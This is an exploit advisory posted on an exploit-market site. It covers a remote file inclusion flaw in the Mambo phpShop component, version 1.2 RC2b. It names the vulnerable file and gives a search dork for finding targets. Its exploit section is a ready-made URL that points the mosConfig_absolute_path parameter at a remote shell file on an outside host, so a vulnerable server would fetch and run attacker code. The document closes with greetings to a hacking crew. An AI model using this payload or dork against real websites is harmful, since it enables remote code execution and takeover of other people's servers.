[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Mambo phpShop Component <= 1.2 RC2b File Include Vulnerability

Author
Cmaster4
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-707
Category
web applications
Date add
16-08-2006
Platform
unsorted
==============================================================
Mambo phpShop Component <= 1.2 RC2b File Include Vulnerability
==============================================================



Affected Application: Mambo phpShop v1.2 RC2b

(Mambo CMS Component)


. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


Discoverd/Found by: Charles Nelwan a.k.a Cmaster4

Team: BatamHacker irc.dal.net crew




. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .


Typ: Remote [x] Local [ ]

Remote File Inclusion [x] SQL Injection [ ]

Level: Low [ ] Middle [x] High [ ]

Application: Mambo phpShop

Version: 1.2 RC2b

Vulnerable File: toolbar.phpshop.html.ph

URL: http://www.mambo-phpshop.net or http://www.mamboportal.com/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=category&filecatid=1054

Description: phpShop component for Mambo. A fully featured shop component with IPN support, categories, userhandling, etc.

inurl:"com_phpshop"


. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


http://www.targer.com/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://Senjata.com/tembuspakeshell.txt



Shoutz:
~~~~~~
~ Special Greetz To My BATAMHACKER CREW ON IRC.DAL.NET h4ntu, havicaz, baylaw
~ To All Indonesian Underground Hacker 





#  0day.today [2024-12-24]  #